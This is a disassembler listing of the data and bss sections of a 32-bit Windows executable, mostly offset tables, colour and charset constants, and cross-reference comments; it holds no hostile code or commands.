dd 37363534h, 42413938h, 46454443h
TlsIndex dd 0 ; DATA XREF: sub_400063E4+C�r
; sub_400063E4+37�r ...
dword_4001A7B4 dd 0 ; sub_40006474+33�o ...
dword_4001A7B8 dd 40000000h dword_4001A7BC dd 0 dword_4001A7C0 dd 0 dd 40000000h, 0
dword_4001A7CC dd 4 dup(0) ; .data:off_4001AFA8�o
dword_4001A7DC dd 0 dword_4001A7E0 dd 0 dword_4001A7E4 dd 2 ; sub_4000B830+32�r ...
dword_4001A7E8 dd 5 ; sub_4000BDA0+5B�r
dword_4001A7EC dd 1 dword_4001A7F0 dd 0A28h ; sub_4000B830+4F�w
dword_4001A7F4 dd 0A3A838h ; sub_4000CC50+4F�o
word_4001A7F8 dw 32h ; DATA XREF: sub_4000A1CC+1AD�r
; sub_4000A1CC+1C9�r
dw 0C08Bh
dword_4001A7FC dd 1C001Fh, 2 dup(1E001Fh), 1F001Fh, 2 dup(1F001Eh), 1D001Fh
; DATA XREF: sub_40009050+24�o
; sub_4000911C+FC�o
dd 2 dup(1E001Fh), 1F001Fh, 2 dup(1F001Eh)
dword_4001A82C dd 0 ; sub_400096A8+33B�r ...
dd 7 dup(0)
off_4001A84C dd offset dword_40007828 ; DATA XREF: sub_4000CC50+128�o
; sub_400190AC+37�o ...
dword_4001A850 dd 7C83039Bh ; resolved to->KERNEL32.GetDiskFreeSpaceExA ; sub_4000C4D8:loc_4000C4F9�r ...
off_4001A854 dd offset dword_40007FCC ; DATA XREF: sub_40007FDC+3B�r
; sub_4000CC50+132�o
dd offset dword_40007FCC+0Ch
off_4001A85C dd offset off_40006BD8 ; DATA XREF: sub_4000828C+43�r
; .text:4000CC44�o
off_4001A860 dd offset off_40006BE0 ; DATA XREF: .text:4000CC38�o
tbyte_4001A864 dt 1.0e18 ; DATA XREF: sub_40008B01+63�r
dw 0C08Bh
flt_4001A870 db 0Ah, 0, 0, 0 ; DATA XREF: sub_400087BC+23�r
; sub_40008B01+78�r ...
word_4001A874 dw 133Fh ; DATA XREF: sub_40008D00+25�r
dw 0C08Bh
flt_4001A878 dd 8.64e7 ; DATA XREF: sub_40008F04+B�r
dword_4001A87C dd 5265C00h ; sub_40008F04:loc_40008F33�r
dword_4001A880 dd 642A2E25h off_4001A884 dd offset off_40006CB0 ; DATA XREF: sub_4000A91C+3A�o
; .text:4000CC2C�o
off_4001A888 dd offset off_40006CB8 ; DATA XREF: .text:4000CC20�o
off_4001A88C dd offset off_40006CC0 ; DATA XREF: .text:4000CC14�o
off_4001A890 dd offset off_40006CC8 ; DATA XREF: .text:4000CC08�o
off_4001A894 dd offset off_40006CD0 ; DATA XREF: .text:4000CBFC�o
off_4001A898 dd offset off_40006CD8 ; DATA XREF: .text:4000CBF0�o
off_4001A89C dd offset off_40006CE0 ; DATA XREF: .text:4000CBE4�o
off_4001A8A0 dd offset off_40006CE8 ; DATA XREF: .text:4000CBD8�o
off_4001A8A4 dd offset off_40006CF0 ; DATA XREF: .text:4000CBCC�o
off_4001A8A8 dd offset off_40006CF8 ; DATA XREF: .text:4000CBC0�o
off_4001A8AC dd offset off_40006D00 ; DATA XREF: .text:4000CBB4�o
off_4001A8B0 dd offset off_40006D08 ; DATA XREF: .text:4000CBA8�o
off_4001A8B4 dd offset off_40006D10 ; DATA XREF: sub_4000A91C+5D�o
; .text:4000CB9C�o
off_4001A8B8 dd offset off_40006D18 ; DATA XREF: .text:4000CB90�o
off_4001A8BC dd offset off_40006D20 ; DATA XREF: .text:4000CB84�o
off_4001A8C0 dd offset off_40006D28 ; DATA XREF: .text:4000CB78�o
off_4001A8C4 dd offset off_40006D30 ; DATA XREF: .text:4000CB6C�o
off_4001A8C8 dd offset off_40006D38 ; DATA XREF: .text:4000CB60�o
off_4001A8CC dd offset off_40006D40 ; DATA XREF: .text:4000CB54�o
off_4001A8D0 dd offset off_40006D48 ; DATA XREF: .text:4000CB48�o
off_4001A8D4 dd offset off_40006D50 ; DATA XREF: .text:4000CB3C�o
off_4001A8D8 dd offset off_40006D58 ; DATA XREF: .text:4000CB30�o
off_4001A8DC dd offset off_40006D60 ; DATA XREF: .text:4000CB24�o
off_4001A8E0 dd offset off_40006D68 ; DATA XREF: .text:4000CB18�o
off_4001A8E4 dd offset off_40006D70 ; DATA XREF: sub_4000A91C+A9�o
; .text:4000CB0C�o
off_4001A8E8 dd offset off_40006D78 ; DATA XREF: .text:4000CB00�o
off_4001A8EC dd offset off_40006D80 ; DATA XREF: .text:4000CAF4�o
off_4001A8F0 dd offset off_40006D88 ; DATA XREF: .text:4000CAE8�o
off_4001A8F4 dd offset off_40006D90 ; DATA XREF: .text:4000CADC�o
off_4001A8F8 dd offset off_40006D98 ; DATA XREF: .text:4000CAD0�o
off_4001A8FC dd offset off_40006DA0 ; DATA XREF: .text:4000CAC4�o
off_4001A900 dd offset off_40006DA8 ; DATA XREF: sub_4000A91C+CE�o
; .text:4000CAB8�o
off_4001A904 dd offset off_40006DB0 ; DATA XREF: .text:4000CAAC�o
off_4001A908 dd offset off_40006DB8 ; DATA XREF: .text:4000CAA0�o
off_4001A90C dd offset off_40006DC0 ; DATA XREF: .text:4000CA94�o
off_4001A910 dd offset off_40006DC8 ; DATA XREF: .text:4000CA88�o
off_4001A914 dd offset off_40006DD0 ; DATA XREF: .text:4000CA7C�o
off_4001A918 dd offset off_40006DD8 ; DATA XREF: .text:4000CA70�o
dword_4001A91C dd 2 ; sub_4000CC50+147�o
dword_4001A920 dd 0A3A7F8h ; .text:4000CA64�o
dd 3
dword_4001A928 dd 0A3A7D8h, 4 dword_4001A930 dd 0A3A7B8h, 5 dword_4001A938 dd 0A3A798h dword_4001A93C dd 64h ; sub_4000B470+D�r ...
dword_4001A940 dd 0A41B08h, 65hdword_4001A948 dd 0A2C038h, 6Ahdword_4001A950 dd 0A41AE0h off_4001A954 dd offset dword_400070B4 ; DATA XREF: sub_4000CC50+15C�o
dword_4001A958 dd 0A3A778h dd offset dword_4000710C
dword_4001A960 dd 0A3A758h dd offset dword_40007164
dword_4001A968 dd 0A3A738h dd offset dword_40007218
dword_4001A970 dd 0A48DB8h dd offset dword_40007270
dword_4001A978 dd 0A48D88h dd offset dword_400072C8
dword_4001A980 dd 0A41AB8h dd offset dword_40007320
dword_4001A988 dd 0A41A90h dd offset dword_400073D4
dword_4001A990 dd 0A41A68h dd offset dword_4000748C
dword_4001A998 dd 0A3A718h dd offset dword_400074EC
dword_4001A9A0 dd 0A41A40h dd offset dword_400075A0
dword_4001A9A8 dd 0A3A6F8h dd offset dword_40007544
dword_4001A9B0 dd 0A3A6D8h dd offset dword_400075F8
dword_4001A9B8 dd 0A48D58h dd offset dword_400075F8
dword_4001A9C0 dd 0A41A18h dd offset dword_400075F8
dword_4001A9C8 dd 0A48D28h dd offset dword_400075F8
dword_4001A9D0 dd 0A333A0h dd offset dword_400075F8
dword_4001A9D8 dd 0A3A6B8h dd offset dword_400075F8
dword_4001A9E0 dd 0A33368h dd offset dword_40007654
dword_4001A9E8 dd 0A3A698h dd offset dword_40006FFC
dword_4001A9F0 dd 0A419F0h dd offset dword_40007710
dword_4001A9F8 dd 0A419C8h dd offset dword_400077C4
dword_4001AA00 dd 0A48CF8h dword_4001AA04 dd 0 dword_4001AA08 dd 80070057h ; sub_4000CEB8+3D�r ...
align 10h
byte_4001AA10 db 1 ; DATA XREF: sub_4000E9CC+9F�r
; sub_4000ED90:loc_4000EE21�r ...
db 8Dh, 40h, 0
dword_4001AA14 dd 0 ; sub_40011DFC+B1�r ...
byte_4001AA18 db 0 ; DATA XREF: sub_4001145C+43�r
db 8Dh, 40h, 0
dword_4001AA1C dd 0FFFFFFFFh ; sub_40012C6C+3E�r ...
off_4001AA20 dd offset aEmpty ; DATA XREF: sub_4001293C+38�r
; sub_40012E54+3C�o
; "Empty"
dd offset dword_400127EC+8
dd offset dword_400127FC+8
dd offset dword_40012810+8
dd offset dword_40012810+18h
dd offset dword_40012810+28h
dd offset dword_40012810+38h
dd offset dword_40012854+8
dd offset dword_40012864+8
dd offset dword_40012864+18h
dd offset dword_40012888+8
dd offset dword_40012888+18h
dd offset dword_40012888+28h
dd offset dword_40012888+38h
dd offset dword_40012888+48h
dd offset dword_40012888+58h
dd offset dword_40012888+64h
dd offset dword_400128F8+8
dd offset dword_40012908+8
dd offset dword_40012918+8
dd offset dword_4001292C+8
dword_4001AA74 dd 1000100h, 2 dup(10100h), 10000h, 0C08B0101hoff_4001AA88 dd offset aFalse_0 ; DATA XREF: sub_40012F38+19�o
; "False"
dd offset dword_40012F1C+8
off_4001AA90 dd offset dword_40012F34 ; DATA XREF: sub_40012F38+2E�o
dword_4001AA94 dd 0 off_4001AA98 dd offset dword_40013F94 ; DATA XREF: sub_40013FA4+19�o
dd offset dword_40013F94+0Ch
off_4001AAA0 dd offset dword_40014730 ; DATA XREF: sub_40014740+19�o
dd offset dword_40014730+0Ch
dd 0
dd 0FFFFFFF5h
dd 0
db 2 dup(0)
byte_4001AAB6 db 1 ; DATA XREF: sub_40014F60+7�r
; sub_40014F8C+C4�r ...
byte_4001AAB7 db 6 ; DATA XREF: sub_40014F60+F�o
; sub_40014F8C+13E�o ...
aTahomasSerif db 'Tahomas Serif',0
align 4
dd 4 dup(0)
dword_4001AAD8 dd 0 ; sub_40014D7C+2�o ...
dd offset dword_4001491C+8
dd 80h
dd offset dword_4001491C+18h
dd 8000h
dd offset dword_40014940+8
dd 8080h
dd offset dword_40014940+18h
dd 800000h
dd offset dword_40014940+28h
dd 800080h
dd offset dword_40014940+38h
dd 808000h
dd offset dword_40014984+8
dd 808080h
dd offset dword_40014984+18h
dd 0C0C0C0h
dd offset dword_40014984+28h
dd 0FFh
dd offset dword_400149B8+8
dd 0FF00h
dd offset dword_400149B8+18h
dd 0FFFFh
dd offset dword_400149B8+28h
dd 0FF0000h
dd offset dword_400149EC+8
dd 0FF00FFh
dd offset dword_400149EC+18h
dd 0FFFF00h
dd offset dword_400149EC+2Ch
dd 0FFFFFFh
dd offset dword_400149EC+3Ch
dd 0C0DCC0h
dd offset dword_400149EC+4Ch
dd 0F0CAA6h
dd offset dword_40014A48+8
dd 0F0FBFFh
dd offset dword_40014A48+1Ch
dd 0A4A0A0h
dd offset dword_40014A48+2Ch
dd 0FF00000Ah
dd offset dword_40014A48+40h
dd 0FF000002h
dd offset dword_40014A48+58h
dd 0FF00000Ch
dd offset dword_40014A48+70h
dd 0FF000001h
dd offset dword_40014A48+88h
dd 0FF00000Fh
dd offset dword_40014AE0+8
dd 0FF000014h
dd offset dword_40014AE0+1Ch
dd 0FF000010h
dd offset dword_40014AE0+34h
dd 0FF000012h
dd offset dword_40014AE0+48h
dd 0FF000009h
dd offset dword_40014AE0+5Ch
dd 20000000h
dd offset dword_40014AE0+74h
dd 0FF00001Bh
dd offset dword_40014AE0+88h
dd 0FF00001Ch
dd offset dword_40014AE0+0A8h
dd 0FF000011h
dd offset dword_40014AE0+0CCh
dd 0FF00000Dh
dd offset dword_40014AE0+0E0h
dd 0FF00000Eh
dd offset dword_40014AE0+0F4h
dd 0FF00001Ah
dd offset dword_40014AE0+10Ch
dd 0FF00000Bh
dd offset dword_40014AE0+120h
dd 0FF000003h
dd offset dword_40014C14+8
dd 0FF000013h
dd offset dword_40014C14+24h
dd 0FF000018h
dd offset dword_40014C14+44h
dd 0FF000017h
dd offset dword_40014C64+8
dd 0FF000004h
dd offset dword_40014C64+1Ch
dd 0FF00001Eh
dd offset dword_40014C64+2Ch
dd 0FF00001Dh
dd offset dword_40014C64+40h
dd 0FF000007h
dd offset dword_40014C64+58h
dd 1FFFFFFFh
dd offset dword_40014C64+6Ch
dd 0FF000000h
dd offset dword_40014C64+7Ch
dd 0FF000015h
dd offset dword_40014C64+90h
dd 0FF000016h
dd offset dword_40014D04+8
dd 0FF000005h
dd offset dword_40014D04+1Ch
dd 0FF000006h
dd offset dword_40014D2C+8
dd 0FF000008h
dd offset dword_40014D2C+20h
dword_4001AC78 dd 0 ; .text:40014F52�o ...
dd offset dword_40014D8C+8
dd 1
dd offset dword_40014DA4+8
dd 2
dd offset dword_40014DA4+20h
dd 4Dh
dd offset dword_40014DA4+38h
dd 80h
dd offset dword_40014DA4+4Ch
dd 81h
dd offset dword_40014E04+8
dd 82h
dd offset dword_40014E04+20h
dd 86h
dd offset dword_40014E04+38h
dd 88h
dd offset dword_40014E04+50h
dd 0A1h
dd offset dword_40014E04+6Ch
dd 0A2h
dd offset dword_40014E04+84h
dd 0B1h
dd offset dword_40014E04+9Ch
dd 0B2h
dd offset dword_40014E04+0B4h
dd 0BAh
dd offset dword_40014E04+0CCh
dd 0CCh
dd offset dword_40014E04+0E4h
dd 0DEh
dd offset dword_40014E04+0FCh
dd 0EEh
dd offset aEasteurope_cha ; "EASTEUROPE_CHARSET"
dd 0FFh
dd offset dword_40014F2C+8
word_4001AD08 dw 0 ; DATA XREF: sub_400151D0+3D�r
dw 1
dd 30002h, 50004h, 70006h, 0C08B0008h
word_4001AD1C dw 1 ; DATA XREF: sub_400155D0+1C�r
dw 10h
dd 6000Bh, 4000Dh, 5000Eh, 3000Ch, 2000Fh, 80009h, 0A0007h
dword_4001AD3C dd 0 dword_4001AD40 dd 0 dword_4001AD44 dd 0A41C68h ; sub_40015794:loc_40015827�r ...
dd 0
dd 80h, 8000h, 8080h, 800000h, 800080h, 808000h, 808080h
dd 0C0C0C0h, 0FFh, 0FF00h, 0FFFFh, 0FF0000h, 0FF00FFh
dd 0FFFF00h, 0FFFFFFh
dword_4001AD88 dd 774FFA6Bh dword_4001AD8C dd 774FEF6Bh ; sub_40016A34+18�r ...
dword_4001AD90 dd 77596178h dword_4001AD94 dd 77596182h dword_4001AD98 dd 775274DCh dword_4001AD9C dd 77527567h dword_4001ADA0 dd 0FFFFFFFFh ; sub_40016A34+21�r ...
dword_4001ADA4 dd 0 dd offset dword_40015E44+14h
dd offset dword_40015E44+28h
dd offset dword_40015E74+8
dd offset dword_40015E84+8
dword_4001ADB8 dd 40h dup(0) off_4001AEB8 dd offset off_40006CC8 ; DATA XREF: .text:4000CC0C�o
off_4001AEBC dd offset off_40006BE8 ; DATA XREF: .text:4000C9C0�o
; sub_4000E0EC+16�r
off_4001AEC0 dd offset off_40006C30 ; DATA XREF: sub_4000DBF4+56�r
off_4001AEC4 dd offset off_40006B30 ; DATA XREF: .text:4000CA58�o
off_4001AEC8 dd offset off_40006D18 ; DATA XREF: .text:4000CB94�o
off_4001AECC dd offset off_40006D58 ; DATA XREF: .text:4000CB34�o
off_4001AED0 dd offset off_40006DC0 ; DATA XREF: .text:4000CA98�o
off_4001AED4 dd offset byte_4001C038 ; DATA XREF: .itext:400193CB�r
off_4001AED8 dd offset off_40006CE8 ; DATA XREF: .text:4000CBDC�o
off_4001AEDC dd offset off_4001C02C ; DATA XREF: sub_4000B72C+79�r
off_4001AEE0 dd offset off_40006C68 ; DATA XREF: sub_4000B654+71�r
; .text:4000C998�o
off_4001AEE4 dd offset off_4001A014 ; DATA XREF: sub_40019144+5A�r
off_4001AEE8 dd offset off_40006DD0 ; DATA XREF: .text:4000CA80�o
off_4001AEEC dd offset off_4001C008 ; DATA XREF: sub_4000B72C+2E�r
; sub_4000B7B0:loc_4000B7F6�r
off_4001AEF0 dd offset off_40006DA8 ; DATA XREF: .text:4000CABC�o
off_4001AEF4 dd offset off_40006CD0 ; DATA XREF: .text:4000CC00�o
off_4001AEF8 dd offset off_4001C000 ; DATA XREF: sub_40016AB0+33�r
; .itext:400193B3�r
off_4001AEFC dd offset off_40006C60 ; DATA XREF: sub_4000DDD4+1AD�r
off_4001AF00 dd offset off_40006C40 ; DATA XREF: sub_4000DDD4+CC�r
off_4001AF04 dd offset dword_4001F274 ; DATA XREF: sub_400113EC+1B�r
off_4001AF08 dd offset off_40015D08 ; DATA XREF: sub_40015EE4+5A�r
off_4001AF0C dd offset off_40006B48 ; DATA XREF: .text:4000CA40�o
off_4001AF10 dd offset off_40006DB0 ; DATA XREF: .text:4000CAB0�o
off_4001AF14 dd offset off_40006D90 ; DATA XREF: .text:4000CAE0�o
off_4001AF18 dd offset off_40006DB8 ; DATA XREF: .text:4000CAA4�o
off_4001AF1C dd offset off_4001C01C ; DATA XREF: sub_4000B72C+44�r
; sub_4000B7B0+58�r
off_4001AF20 dd offset byte_4001C04D ; DATA XREF: sub_40016A34+3C�r
; sub_40016A34:loc_40016A92�r
off_4001AF24 dd offset off_40006B18 ; DATA XREF: sub_4000B230+44�r
off_4001AF28 dd offset off_40006BD0 ; DATA XREF: sub_4000AF68+83�r
off_4001AF2C dd offset off_40006B10 ; DATA XREF: sub_4000B72C�r
; sub_4000DDD4+164�r
off_4001AF30 dd offset off_40006CF0 ; DATA XREF: .text:4000CBD0�o
off_4001AF34 dd offset off_40006B50 ; DATA XREF: .text:4000CA38�o
off_4001AF38 dd offset off_40006BD8 ; DATA XREF: .text:4000CC48�o
off_4001AF3C dd offset dword_4001F268 ; DATA XREF: sub_40010874+3B�r
off_4001AF40 dd offset off_40006C90 ; DATA XREF: sub_4000B3D8�r
off_4001AF44 dd offset off_40006C48 ; DATA XREF: .text:4000C9B0�o
; sub_4000DDD4+18A�r
off_4001AF48 dd offset off_40006D40 ; DATA XREF: .text:4000CB58�o
off_4001AF4C dd offset dword_4001C21C ; DATA XREF: sub_4000AF68+1E�r
off_4001AF50 dd offset off_40006D60 ; DATA XREF: .text:4000CB28�o
off_4001AF54 dd offset off_4001C00C ; DATA XREF: sub_4000B72C+51�r
; sub_4000B7B0+61�r
off_4001AF58 dd offset off_40006D20 ; DATA XREF: .text:4000CB88�o
off_4001AF5C dd offset off_4001C004 ; DATA XREF: sub_4000B72C+39�r
; sub_4000B7B0+4F�r
off_4001AF60 dd offset off_4001C010 ; DATA XREF: sub_4000B72C+5C�r
; sub_4000B7B0+6A�r
off_4001AF64 dd offset off_40015D20 ; DATA XREF: sub_40016280+4C�r
; sub_400166E8+1A�r
off_4001AF68 dd offset off_40013F84 ; DATA XREF: sub_4001552C+2E�r
off_4001AF6C dd offset off_40006D68 ; DATA XREF: .text:4000CB1C�o
off_4001AF70 dd offset off_40006BB0 ; DATA XREF: .text:4000C9D8�o
off_4001AF74 dd offset off_40006BA8 ; DATA XREF: .text:4000C9F0�o
off_4001AF78 dd offset off_40006BB8 ; DATA XREF: .text:4000C9E0�o
off_4001AF7C dd offset off_40012EDC ; DATA XREF: sub_400140B4+11�r
off_4001AF80 dd offset off_40006DA0 ; DATA XREF: .text:4000CAC8�o
off_4001AF84 dd offset off_40006B20 ; DATA XREF: .text:4000CA68�o
off_4001AF88 dd offset off_40006B68 ; DATA XREF: .text:4000CA20�o
off_4001AF8C dd offset off_40006BE0 ; DATA XREF: .text:4000CC3C�o
off_4001AF90 dd offset off_40012ED4 ; DATA XREF: sub_40013A1C+51�r
off_4001AF94 dd offset off_40006C00 ; DATA XREF: .text:4000C9B8�o
; sub_4000DD80+16�r
off_4001AF98 dd offset off_40006C28 ; DATA XREF: sub_4000DDD4+1FF�r
off_4001AF9C dd offset off_40006D10 ; DATA XREF: .text:4000CBA0�o
off_4001AFA0 dd offset off_40012EEC ; DATA XREF: sub_400138D4:loc_400138E8�r
off_4001AFA4 dd offset off_40006C78 ; DATA XREF: .text:4000C990�o
off_4001AFA8 dd offset dword_4001A7CC ; DATA XREF: sub_40016280+2A2�r
; sub_400165F0+AD�r
off_4001AFAC dd offset off_40012ECC ; DATA XREF: sub_40013B54+89�r
off_4001AFB0 dd offset off_40006D38 ; DATA XREF: .text:4000CB64�o
off_4001AFB4 dd offset off_40006C20 ; DATA XREF: .text:4000C9C8�o
; sub_4000DC90+16�r
off_4001AFB8 dd offset off_4001C044 ; DATA XREF: .itext:400193D5�r
; .itext:400193E1�r
off_4001AFBC dd offset off_40006D28 ; DATA XREF: .text:4000CB7C�o
off_4001AFC0 dd offset dword_4001F270 ; DATA XREF: sub_4000FCA4+33�r
off_4001AFC4 dd offset off_40006D48 ; DATA XREF: .text:4000CB4C�o
off_4001AFC8 dd offset dword_4001F278 ; DATA XREF: sub_40011424+1B�r
off_4001AFCC dd offset off_40012F04 ; DATA XREF: sub_4001464C+48�r
off_4001AFD0 dd offset off_4001A010 ; DATA XREF: sub_40019144+4D�r
off_4001AFD4 dd offset off_40006C18 ; DATA XREF: .text:4000C9D0�o
; sub_4000DBA0+16�r
off_4001AFD8 dd offset off_40006CB8 ; DATA XREF: .text:4000CC24�o
off_4001AFDC dd offset off_40006CF8 ; DATA XREF: .text:4000CBC4�o
off_4001AFE0 dd offset off_40006D88 ; DATA XREF: .text:4000CAEC�o
off_4001AFE4 dd offset off_40012EE4 ; DATA XREF: sub_40013898:loc_400138AB�r
off_4001AFE8 dd offset off_40006B40 ; DATA XREF: .text:4000CA48�o
off_4001AFEC dd offset off_40006B80 ; DATA XREF: .text:4000CA08�o
off_4001AFF0 dd offset dword_4001F264 ; DATA XREF: sub_4000F6A8+7E�r
; sub_400101AC+38�r
off_4001AFF4 dd offset off_40006C58 ; DATA XREF: sub_4000DDD4+13E�r
off_4001AFF8 dd offset off_40006D30 ; DATA XREF: .text:4000CB70�o
off_4001AFFC dd offset off_40006B90 ; DATA XREF: sub_4000B72C+17�r
off_4001B000 dd offset off_40006D98 ; DATA XREF: .text:4000CAD4�o
off_4001B004 dd offset off_40006B88 ; DATA XREF: .text:4000CA00�o
off_4001B008 dd offset off_40006D70 ; DATA XREF: .text:4000CB10�o
off_4001B00C dd offset off_4001C024 ; DATA XREF: sub_4000B72C+6C�r
; sub_4000B7B0+73�r
off_4001B010 dd offset off_40006C80 ; DATA XREF: .text:4000C988�o
off_4001B014 dd offset off_40006C38 ; DATA XREF: sub_4000DCE4+56�r
off_4001B018 dd offset off_4001A018 ; DATA XREF: sub_40019144+67�r
off_4001B01C dd offset off_40006BF8 ; DATA XREF: sub_4000B488+54�r
off_4001B020 dd offset off_40006BA0 ; DATA XREF: sub_4000B488+16C�r
off_4001B024 dd offset off_4001A020 ; DATA XREF: sub_40019144+81�r
off_4001B028 dd offset off_40006DC8 ; DATA XREF: .text:4000CA8C�o
off_4001B02C dd offset off_4001F294 ; DATA XREF: sub_40016AB0+3C�r
; .itext:400193AB�r
off_4001B030 dd offset off_40006CA0 ; DATA XREF: sub_4000C41C+41�r
off_4001B034 dd offset off_40006B38 ; DATA XREF: .text:4000CA50�o
off_4001B038 dd offset off_40006C70 ; DATA XREF: sub_4000B300+38�r
; .text:4000C9A0�o
off_4001B03C dd offset off_40006D50 ; DATA XREF: .text:4000CB40�o
off_4001B040 dd offset off_40006D78 ; DATA XREF: .text:4000CB04�o
off_4001B044 dd offset off_40015D10 ; DATA XREF: sub_400165BC+19�r
off_4001B048 dd offset byte_4001C04C ; DATA XREF: sub_4000AF68+14�r
off_4001B04C dd offset off_40006D80 ; DATA XREF: .text:4000CAF8�o
off_4001B050 dd offset off_40006C08 ; DATA XREF: .text:4000C9A8�o
; sub_4000DDD4+F2�r
off_4001B054 dd offset off_4001C020 ; DATA XREF: sub_40016AB0+2A�r
; .itext:400193C3�r
off_4001B058 dd offset dword_4001F27C ; DATA XREF: sub_4001145C+2D�r
off_4001B05C dd offset off_40012EF4 ; DATA XREF: sub_40013708:loc_40013718�r
; sub_400137FC:loc_4001380B�r
off_4001B060 dd offset off_40006C98 ; DATA XREF: sub_4000B488+110�r
off_4001B064 dd offset dword_4001F228 ; DATA XREF: sub_4000E8E0+31�r
; sub_4000E8E0+5D�r ...
off_4001B068 dd offset off_40006CE0 ; DATA XREF: .text:4000CBE8�o
off_4001B06C dd offset off_40006C88 ; DATA XREF: sub_4000B300+63�r
off_4001B070 dd offset off_40006D00 ; DATA XREF: .text:4000CBB8�o
off_4001B074 dd offset off_4001A038 ; DATA XREF: sub_4000C230+7�r
off_4001B078 dd offset off_40006DD8 ; DATA XREF: .text:4000CA74�o
off_4001B07C dd offset off_40015D18 ; DATA XREF: sub_400166D0�r
off_4001B080 dd offset off_40006CC0 ; DATA XREF: .text:4000CC18�o
off_4001B084 dd offset off_40006B28 ; DATA XREF: .text:4000CA60�o
off_4001B088 dd offset off_40006BC0 ; DATA XREF: .text:4000C9E8�o
off_4001B08C dd offset off_40006B60 ; DATA XREF: .text:4000CA28�o
off_4001B090 dd offset off_40006C50 ; DATA XREF: sub_4000DDD4+9C�r
off_4001B094 dd offset off_40006B58 ; DATA XREF: .text:4000CA30�o
off_4001B098 dd offset off_40006D08 ; DATA XREF: .text:4000CBAC�o
off_4001B09C dd offset off_4001A84C ; DATA XREF: sub_4000DDD4:loc_4000DFA1�r
; sub_4001293C+D8�r
off_4001B0A0 dd offset dword_4001F26C ; DATA XREF: sub_40010E0C+38�r
off_4001B0A4 dd offset off_40006CA8 ; DATA XREF: sub_4000C41C:loc_4000C473�r
off_4001B0A8 dd offset off_40006B70 ; DATA XREF: .text:4000CA18�o
off_4001B0AC dd offset off_40006CB0 ; DATA XREF: .text:4000CC30�o
off_4001B0B0 dd offset dword_4001F25C ; DATA XREF: sub_4000EBF8+33�r
; sub_4000F6A8+56�r
off_4001B0B4 dd offset off_4001A01C ; DATA XREF: sub_400082E4+1�r
; sub_400082E4+C�r ...
off_4001B0B8 dd offset off_40006BC8 ; DATA XREF: sub_4000ADE0+DE�r
off_4001B0BC dd offset off_40006B98 ; DATA XREF: .text:4000C9F8�o
off_4001B0C0 dd offset off_40006C10 ; DATA XREF: sub_4000DDD4+118�r
off_4001B0C4 dd offset off_40006B78 ; DATA XREF: .text:4000CA10�o
off_4001B0C8 dd offset dword_4001A7E4 ; DATA XREF: sub_40014F8C:loc_400150FA�r
off_4001B0CC dd offset off_40006BF0 ; DATA XREF: sub_4000B488+45�r
off_4001B0D0 dd offset off_40006CD8 ; DATA XREF: .text:4000CBF4�o
off_4001B0D4 dd offset off_40012EFC ; DATA XREF: sub_400146B4+41�r
align 200h
_data ends
; Section 4. (virtual address 0001C000)
; Virtual size : 00007E54 ( 32340.)
; Section size in file : 00007E54 ( 32340.)
; Offset to raw data for section: 0001C000
; Flags C0000000: Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Regular
; Segment permissions: Read/Write
_bss segment para public '' use32
assume cs:_bss
;org 4001C000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
off_4001C000 dd offset sub_40016958 ; DATA XREF: .itext:40019034�w
; .data:off_4001AEF8�o
off_4001C004 dd offset sub_4000B71C ; DATA XREF: .text:400044AA�r
; .data:off_4001AF5C�o
off_4001C008 dd offset sub_4000B2B0 ; DATA XREF: sub_40002D04+9�r
; sub_40002D04+16�r ...
off_4001C00C dd offset sub_4000B470 ; DATA XREF: .data:off_4001AF54�o
off_4001C010 dd offset sub_4000B654 ; DATA XREF: sub_400040D8+25�r
; .text:40004488�r ...
off_4001C014 dd offset sub_40001168 ; DATA XREF: sub_40003FE8+14�r
; sub_40004004+16�r ...
off_4001C018 dd offset sub_40001178 ; DATA XREF: sub_400040D8+D2�r
; .text:40004470�r ...
off_4001C01C dd offset dword_40006E2C ; DATA XREF: .data:off_4001AF1C�o
off_4001C020 dd offset sub_40016180 ; DATA XREF: .data:off_4001B054�o
off_4001C024 dd offset sub_4000B3BC ; DATA XREF: .data:off_4001B00C�o
dword_4001C028 dd 0 ; sub_40004790+B4�r
off_4001C02C dd offset sub_4000B3D8 ; DATA XREF: sub_400030B4�r
; sub_400030B4+9�r ...
dword_4001C030 dd 40000000h dword_4001C034 dd 364h byte_4001C038 db 0 ; DATA XREF: sub_400045E4+33�w
; .data:off_4001AED4�o
align 4
dword_4001C03C dd 0Ah dword_4001C040 dd 142340h off_4001C044 dd offset sub_40016A34 ; DATA XREF: .data:off_4001AFB8�o
dword_4001C048 dd 0 byte_4001C04C db 0 ; DATA XREF: sub_40004704+1�r
; .data:off_4001B048�o
byte_4001C04D db 0 ; DATA XREF: sub_40001654�r
; sub_40001734+C�r ...
byte_4001C04E db 2 ; DATA XREF: .itext:4001902D�w
align 10h
dword_4001C050 dd 0 ; sub_40006350+19�o
word_4001C054 dw 0D7B0h ; DATA XREF: .itext:40019051�w
align 4
dd 71h dup(0)
dword_4001C21C dd 0 ; sub_40004704+1E�o ...
word_4001C220 dw 0D7B0h ; DATA XREF: sub_40004704+A�r
; .itext:4001905A�w
align 8
dword_4001C228 dd 0 dd 3 dup(0)
dword_4001C238 dd 0 dd 6Bh dup(0)
dword_4001C3E8 dd 0 ; sub_40003390+26�o ...
word_4001C3EC dw 0D7B0h ; DATA XREF: .itext:40019063�w
align 10h
dd 71h dup(0)
byte_4001C5B4 db 0 ; DATA XREF: sub_40002BB4:loc_40002BCF�r
align 4
dword_4001C5B8 dd 0FFFFFFFFh ; .itext:loc_40019000�w
dword_4001C5BC dd 4E4h ; sub_400049C4+C�r ...
byte_4001C5C0 db 0 ; DATA XREF: sub_40001734+1A�r
; sub_400029B8:loc_400029E1�w
align 2
dw 804h
dd 1814100Ch, 2824201Ch, 3834302Ch, 4844403Ch, 50504C4Ch
dd 58585454h, 60605C5Ch, 68686464h, 70706C6Ch, 74747474h
dd 78787878h, 7C7C7C7Ch, 80808080h, 84848484h, 88888888h
dd 8C8C8888h, 8C8C8C8Ch, 90909090h, 94949090h, 94949494h
dd 2 dup(98989898h), 2 dup(9C9C9C9Ch), 2 dup(0A0A0A0A0h)
dd 0A4A4A0A0h, 2 dup(0A4A4A4A4h), 3 dup(0A8A8A8A8h), 3 dup(0ACACACACh)
dd 3 dup(0B0B0B0B0h), 0B4B4B0B0h, 3 dup(0B4B4B4B4h), 4 dup(0B8B8B8B8h)
dd 4 dup(0BCBCBCBCh), 0C0C0BCBCh, 4 dup(0C0C0C0C0h), 0C4C4C0C0h
